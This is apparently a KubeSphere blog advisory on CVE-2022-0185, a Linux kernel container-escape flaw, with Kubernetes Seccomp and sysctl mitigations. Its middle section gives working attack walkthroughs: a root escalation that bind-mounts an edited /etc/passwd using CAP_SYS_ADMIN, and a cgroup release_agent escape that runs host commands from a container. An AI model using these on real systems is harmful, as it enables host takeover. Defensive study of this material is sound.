High Risk!! Alert on a New Kubernetes Container Escape Vulnerability

Author: 米开朗基杨, KubeSphere evangelist and cloud native addict

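On January 18, 2022, Linux maintainers and vendors disclosed a heap buffer overflow in the legacy_parse_param function of the Filesystem Context functionality in the Linux kernel (5.1-rc1+). The vulnerability is tracked as CVE-2022-0185 and is rated high severity, with a score of 7.8.

The vulnerability allows out-of-bounds writes in kernel memory. By exploiting it, an unprivileged attacker can bypass any Linux namespace restriction and escalate to root. For example, an attacker who has compromised one of your containers can escape from the container and escalate privileges.

The vulnerability was introduced in Linux kernel 5.1-rc1 in March 2019. The patch released on January 18 fixes it, and all Linux users are advised to download and install the latest kernel version.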

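Vulnerability details

The vulnerability is caused by an integer underflow in the legacy_parse_param function of the Filesystem Context functionality (fs/fs_context.c). The Filesystem Context is used to create the superblock for mounting and remounting a filesystem. The superblock records the characteristics of a filesystem, such as block and file sizes, as well as any storage blocks.

Feeding 4095 bytes or more of input to legacy_parse_param bypasses the input length check and results in an out-of-bounds write, which triggers the vulnerability. An attacker can use this to write malicious data into other parts of kernel memory, either crashing the system or executing arbitrary code to escalate privileges.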
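To make the underflow concrete, here is a small arithmetic sketch in Python. It is not kernel code and it does not touch the vulnerable path. It assumes the length check has the shape `len > PAGE_SIZE - 2 - size`, evaluated with 64-bit unsigned arithmetic, which is how public write-ups of CVE-2022-0185 describe it. The function name `length_check_rejects` is made up for this illustration.

```python
PAGE_SIZE = 4096
U64_MASK = (1 << 64) - 1  # assumption: the subtraction is done in 64-bit unsigned arithmetic


def length_check_rejects(size: int, length: int) -> bool:
    """Mimic a check of the form `len > PAGE_SIZE - 2 - size` with unsigned wraparound.

    size   -- bytes already accumulated in the buffer
    length -- bytes about to be appended
    """
    limit = (PAGE_SIZE - 2 - size) & U64_MASK  # wraps around once size >= 4095
    return length > limit


for size in (4000, 4094, 4095, 4096):
    limit = (PAGE_SIZE - 2 - size) & U64_MASK
    verdict = "rejected" if length_check_rejects(size, 100) else "ACCEPTED"
    print(f"accumulated={size} limit={limit:#x} appending 100 bytes: {verdict}")
```

With 4094 bytes or fewer accumulated, the limit is small and the oversized append is rejected. Once 4095 bytes have accumulated, the subtraction wraps around to a huge unsigned value, so the check accepts any length and the write runs past the end of the buffer.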

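The input to legacy_parse_param is supplied through the fsconfig system call, which is used to configure the creation context of a filesystem (for example, the superblock of an ext4 filesystem).

// Use the fsconfig system call to add the NUL-terminated string pointed to by val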
fsconfig(fd, FSCONFIG_SET_STRING, "\x00", val, 0);

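To use the fsconfig system call, an unprivileged user must hold at least CAP_SYS_ADMIN in their current namespace. This means that being able to enter another namespace in which they hold that capability is enough to exploit the vulnerability.

If an unprivileged user does not have CAP_SYS_ADMIN, the attacker can obtain it with the unshare(CLONE_NEWNS|CLONE_NEWUSER) system call. unshare lets a process create new namespaces, here a new mount namespace and a new user namespace, and inside the new user namespace the process holds the capabilities needed for the rest of the attack. This technique matters a great deal in the world of Kubernetes and containers, which rely on Linux namespaces to isolate Pods: an attacker can use it in a container escape. Once the escape succeeds, the attacker gains full control of the host operating system and of every container running on it, can go on to attack other machines on the internal network, and can even deploy malicious containers in the Kubernetes cluster.

The research team that discovered the vulnerability published exploit code and a proof of concept on GitHub on January 25.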

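PoC

Docker and other container runtimes apply a Seccomp profile by default, which blocks processes in a container from making dangerous system calls and thereby protects the Linux namespace boundary.

Seccomp (short for secure computing mode) was introduced into the Linux kernel in version 2.6.12 (March 8, 2005). It restricted the system calls available to a process to four: read, write, _exit, and sigreturn. This original mode works as an allowlist: a process in this mode can use only its already-open file descriptors and those four system calls, and if it attempts any other system call the kernel terminates it with SIGKILL or SIGSYS.

By default, however, Kubernetes does not apply any Seccomp or AppArmor/SELinux profile to restrict the system calls of a Pod. That is dangerous: processes in the Pod are free to make dangerous system calls and can wait for a chance to obtain the privileges they need (such as CAP_SYS_ADMIN) for further attacks.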
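A quick way to see whether a process is actually running under a Seccomp filter is to read the `Seccomp:` field of /proc/self/status, where 0 means disabled, 1 means strict mode, and 2 means filter mode. The sketch below is only an illustration of that check; the helper name `seccomp_mode` is made up for this article.

```python
from pathlib import Path

# Values of the "Seccomp:" field in /proc/<pid>/status
SECCOMP_MODES = {0: "disabled", 1: "strict", 2: "filter"}


def seccomp_mode(status_text: str) -> str:
    """Return the Seccomp mode named in the text of a /proc/<pid>/status file."""
    for line in status_text.splitlines():
        # "Seccomp_filters:" also exists on newer kernels, so match the colon too
        if line.startswith("Seccomp:"):
            return SECCOMP_MODES.get(int(line.split()[1]), "unknown")
    return "unknown"


if __name__ == "__main__":
    status = Path("/proc/self/status")
    if status.exists():  # only present on Linux
        print("Seccomp mode:", seccomp_mode(status.read_text()))
```

Run inside a container, a result of "filter" suggests that a runtime profile is in place, while "disabled" matches the default Kubernetes behaviour described above.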

Let's start with a Docker example. In a standard Docker environment the unshare command does not work, because Docker's Seccomp filter blocks the system call that the command relies on.

$ docker run --rm -it alpine /bin/sh
/ # unshare
unshare: unshare(0x0): Operation not permitted

Now let's look at a Kubernetes Pod:

$ kubectl run --rm -it test --image=ubuntu /bin/bash
If you don't see a command prompt, try pressing enter.
root@test:/# lsns | grep user
4026531837 user        3   1 root /bin/bash
root@test:/#
root@test:/# apt update && apt install -y libcap2 libcap-ng-utils
root@test:/# ......
root@test:/# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap

As you can see, the root user in the Pod does not have the CAP_SYS_ADMIN capability, but we can obtain it with the unshare command.

root@test:/# unshare -Urm
#
# pscap -a
ppid  pid   name        command           capabilities
0     1     root        bash              chown, dac_override, fowner, fsetid, kill, setgid, setuid, setpcap, net_bind_service, net_raw, sys_chroot, mknod, audit_write, setfcap
1     265   root        sh                full
# lsns | grep user
4026532695 user        3   265 root -sh
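The pscap output above can be cross-checked without installing extra packages, because the kernel exposes the effective capability set as a hexadecimal bitmask in the `CapEff:` field of /proc/self/status. The following sketch decodes that mask and tests the CAP_SYS_ADMIN bit (bit 21 in linux/capability.h). The helper names are made up for this illustration.

```python
from pathlib import Path

CAP_SYS_ADMIN = 21  # bit index of CAP_SYS_ADMIN in linux/capability.h


def effective_caps(status_text: str) -> str:
    """Extract the hexadecimal CapEff mask from the text of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    raise ValueError("CapEff field not found")


def has_capability(cap_hex: str, cap_bit: int = CAP_SYS_ADMIN) -> bool:
    """Return True if the given capability bit is set in the hexadecimal mask."""
    return bool(int(cap_hex, 16) & (1 << cap_bit))


# 00000000a80425fb encodes exactly the capability list printed for bash above
print(has_capability("00000000a80425fb"))  # before unshare
print(has_capability("000001ffffffffff"))  # a full capability set

if __name__ == "__main__":
    status = Path("/proc/self/status")
    if status.exists():  # only present on Linux
        print("CAP_SYS_ADMIN:", has_capability(effective_caps(status.read_text())))
```

The first mask has no CAP_SYS_ADMIN bit, while the full set does, which mirrors the difference between the bash and sh rows in the pscap output.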

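So what can you do once you have CAP_SYS_ADMIN? Here are two examples that show how CAP_SYS_ADMIN can be used to penetrate a system.

Escalating an ordinary user to root!

The following trick escalates an ordinary user on the host straight to root.

First, grant python3 the CAP_SYS_ADMIN capability (note that this cannot be done on a symbolic link, only on the real file).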

$ which python3
/usr/bin/python3

$ ll /usr/bin/python3
lrwxrwxrwx 1 root root 9 Mar 13  2020 /usr/bin/python3 -> python3.8*

$ setcap CAP_SYS_ADMIN+ep /usr/bin/python3.8
$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_sys_admin+ep

Create an ordinary user.

$ useradd test -d /home/test -m

Then switch to the ordinary user and go to the user's home directory.

$ su test
$ cd ~

Copy /etc/passwd to the current directory and change the root user's password to "password".

$ cp /etc/passwd ./
$ openssl passwd -1 -salt abc password
$1$abc$BXBqpb9BZcZhXLgbee.0s/

# Change root:x on the first line to root:$1$abc$BXBqpb9BZcZhXLgbee.0s/
$ head -2 passwd
root:$1$abc$BXBqpb9BZcZhXLgbee.0s/:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

Bind-mount the modified passwd file over /etc/passwd.

# cat mount-passwd.py
from ctypes import *
libc = CDLL("libc.so.6")
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
MS_BIND = 4096
source = b"/home/test/passwd"
target = b"/etc/passwd"
filesystemtype = b"none"
options = b"rw"
mountflags = MS_BIND
libc.mount(source, target, filesystemtype, mountflags, options)

$ python3 mount-passwd.py

**Now for the moment of truth!!!** Switch directly to the root user and enter the password "password".

$ su root
Password: 
root@coredns:/home/test#

Like magic, we have switched to the root user...

Let's check whether we really have root privileges:

$ find / -name "*flag*" 2>/dev/null
/sys/kernel/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/tracing/events/power/pm_qos_update_flags
/sys/kernel/debug/block/vdb/hctx0/flags
/sys/kernel/debug/block/vda/hctx0/flags
/sys/kernel/debug/block/loop7/hctx0/flags
/sys/kernel/debug/block/loop6/hctx0/flags
/sys/kernel/debug/block/loop5/hctx0/flags
/sys/kernel/debug/block/loop4/hctx0/flags
/sys/kernel/debug/block/loop3/hctx0/flags
/sys/kernel/debug/block/loop2/hctx0/flags
/sys/kernel/debug/block/loop1/hctx0/flags
/sys/kernel/debug/block/loop0/hctx0/flags
....

$ cat /sys/kernel/debug/block/vdb/hctx0/flags
alloc_policy=FIFO SHOULD_MERGE

Yep, that's root all right.

Finally, remember to unmount /etc/passwd.

$ umount /etc/passwd

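So, System Reboot Engineers, go and check right now whether the ordinary users you have handed out to other people have the CAP_SYS_ADMIN capability~~

Viewing all host processes from inside a container!

Now for a container example. The following trick lets you list every process running on the host from inside a container.

We don't need the --privileged flag to run a privileged container; that would be no fun.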

$ docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

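Next, run the commands below inside the container. The end result is that ps aux is executed on the host and its output is saved to the /output file in the container.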

# Mounts the RDMA cgroup controller and create a child cgroup
# This technique should work with the majority of cgroup controllers
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the RDMA cgroup controller, try change rdma to memory to fix it
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
# Finds path of OverlayFS mount for container
# Unless the configuration explicitly exposes the mount point of the host filesystem
# see https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Creates a payload
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
# By creating a /bin/sh process and writing its PID to the cgroup.procs file in "x" child cgroup directory
# The script on the host will execute after /bin/sh exits 
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output

In the end, you can see every process running on the host from inside the container:

root@0c84f7587629:/# cat /output
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root           1  0.0  0.3 172704 13148 ?        Ss    2021 131:32 /sbin/init nopti
root           2  0.0  0.0      0     0 ?        S     2021   0:18 [kthreadd]
root           3  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_gp]
root           4  0.0  0.0      0     0 ?        I<    2021   0:00 [rcu_par_gp]
root           6  0.0  0.0      0     0 ?        I<    2021   0:00 [kworker/0:0H-kblockd]
root           8  0.0  0.0      0     0 ?        I<    2021   0:00 [mm_percpu_wq]
root           9  0.0  0.0      0     0 ?        S     2021  18:36 [ksoftirqd/0]
root          10  0.0  0.0      0     0 ?        I     2021 262:22 [rcu_sched]
root          11  0.0  0.0      0     0 ?        S     2021   3:06 [migration/0]
root          12  0.0  0.0      0     0 ?        S     2021   0:00 [idle_inject/0]
root          14  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/0]
root          15  0.0  0.0      0     0 ?        S     2021   0:00 [cpuhp/1]
......

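I won't explain what each of these commands does. If you are interested, you can work through them with the help of the comments.

What is certain is that the CAP_SYS_ADMIN capability opens up many more possibilities for an attacker, on the host and in containers alike. This is especially true of container environments, so if upgrading the kernel is not an option for reasons beyond our control, we need to look for other solutions.

Solutions

Container level

Starting with v1.22, Kubernetes can apply the container runtime's default Seccomp profile to workloads automatically, protecting Pods, Deployments, StatefulSets, DaemonSets, and so on. That cluster-wide default is still in Alpha at the time of writing, but you do not have to wait for it: a Seccomp profile, either the runtime default or one of your own, can be set explicitly in a workload's securityContext, and AppArmor profiles can be attached to workloads as well. For example: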

# pod-test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: protected
spec:
  containers:
    - name: protected
      image: ubuntu
      command:
      - sleep
      - infinity
      securityContext:
        seccompProfile:
          type: RuntimeDefault

After creating the Pod, try to obtain the CAP_SYS_ADMIN capability with unshare.

$ kubectl exec -it protected -- bash
root@protected:/#
root@protected:/# unshare -Urm
unshare: unshare failed: Operation not permitted

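The output shows that the unshare system call was blocked, so an attacker can no longer use it to obtain the capability and carry out the attack.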
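Since the protection depends on every workload carrying a seccompProfile, it can help to audit manifests for containers that lack one. The sketch below works on a Pod manifest that has already been loaded into a Python dict (for example, from the JSON printed by kubectl get pod -o json). The function names are made up for this illustration, and it only looks at the seccompProfile fields of the Pod-level and container-level securityContext.

```python
def _profile_type(security_context):
    """Return seccompProfile.type from a securityContext dict, or None if unset."""
    return ((security_context or {}).get("seccompProfile") or {}).get("type")


def containers_without_seccomp(pod: dict) -> list:
    """List the names of containers that end up with no Seccomp profile.

    A container-level seccompProfile takes precedence over the Pod-level one.
    """
    spec = pod.get("spec") or {}
    pod_level = _profile_type(spec.get("securityContext"))
    unprotected = []
    for container in (spec.get("containers") or []) + (spec.get("initContainers") or []):
        effective = _profile_type(container.get("securityContext")) or pod_level
        if effective in (None, "Unconfined"):
            unprotected.append(container["name"])
    return unprotected


# The "protected" Pod from pod-test.yaml, and a bare Pod like the earlier "test" Pod
protected = {"spec": {"containers": [{
    "name": "protected",
    "image": "ubuntu",
    "securityContext": {"seccompProfile": {"type": "RuntimeDefault"}},
}]}}
bare = {"spec": {"containers": [{"name": "test", "image": "ubuntu"}]}}

print(containers_without_seccomp(protected))  # []
print(containers_without_seccomp(bare))       # ['test']
```

The check is deliberately conservative: a container is reported both when no profile is set anywhere and when the effective profile is Unconfined.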

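Host level

Another option is to disable the use of user namespaces by unprivileged users at the host level, which does not require a reboot. On Ubuntu, for example, the two commands below take effect immediately and also persist across reboots.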

$ echo "kernel.unprivileged_userns_clone=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf

On Red Hat family systems, the following commands achieve the same effect.

$ echo "user.max_user_namespaces=0" > /etc/sysctl.d/userns.conf
$ sysctl -p /etc/sysctl.d/userns.conf
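To confirm that the setting has taken effect, the two sysctl values can be read back from /proc/sys. The sketch below is one way to do that; the helper names `read_sysctl` and `userns_blocked` are made up for this illustration, and a sysctl that does not exist on the current distribution is simply reported as None.

```python
from pathlib import Path
from typing import Optional


def read_sysctl(name: str, proc_root: str = "/proc/sys") -> Optional[int]:
    """Read an integer sysctl such as 'user.max_user_namespaces'; None if unavailable."""
    path = Path(proc_root, *name.split("."))
    try:
        return int(path.read_text().strip())
    except (OSError, ValueError):
        return None


def userns_blocked(userns_clone: Optional[int], max_userns: Optional[int]) -> bool:
    """True if either setting is 0, the value written by the commands above."""
    return userns_clone == 0 or max_userns == 0


if __name__ == "__main__":
    clone = read_sysctl("kernel.unprivileged_userns_clone")  # Ubuntu example above
    limit = read_sysctl("user.max_user_namespaces")          # Red Hat example above
    print("kernel.unprivileged_userns_clone =", clone)
    print("user.max_user_namespaces =", limit)
    print("user namespaces blocked:", userns_blocked(clone, limit))
```

If the last line prints False after you have applied the setting, check that the sysctl name matches your distribution.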

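To sum up, here are the recommendations for dealing with this vulnerability:

If your environment can tolerate patching the kernel and rebooting the system, patch or upgrade the kernel.
Reduce the use of privileged containers that have access to CAP_SYS_ADMIN.
For unprivileged containers, make sure a Seccomp filter blocks their calls to unshare to reduce the risk. Docker is fine by default; Kubernetes needs extra steps.
In the future, Seccomp profiles can be enabled for all workloads in a Kubernetes cluster. This feature is still in Alpha and has to be turned on with a feature gate.
Disable the use of user namespaces by unprivileged users at the host level.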

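Final thoughts

Container environments are intricate, especially distributed scheduling platforms like Kubernetes. Every component has its own lifecycle and attack surface, so security risks surface easily, and cluster administrators have to pay attention to security in every detail. Overall, in the vast majority of cases the security of containers depends on the security of the Linux kernel, so we need to keep a constant eye on security issues and apply the corresponding fixes as soon as possible.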
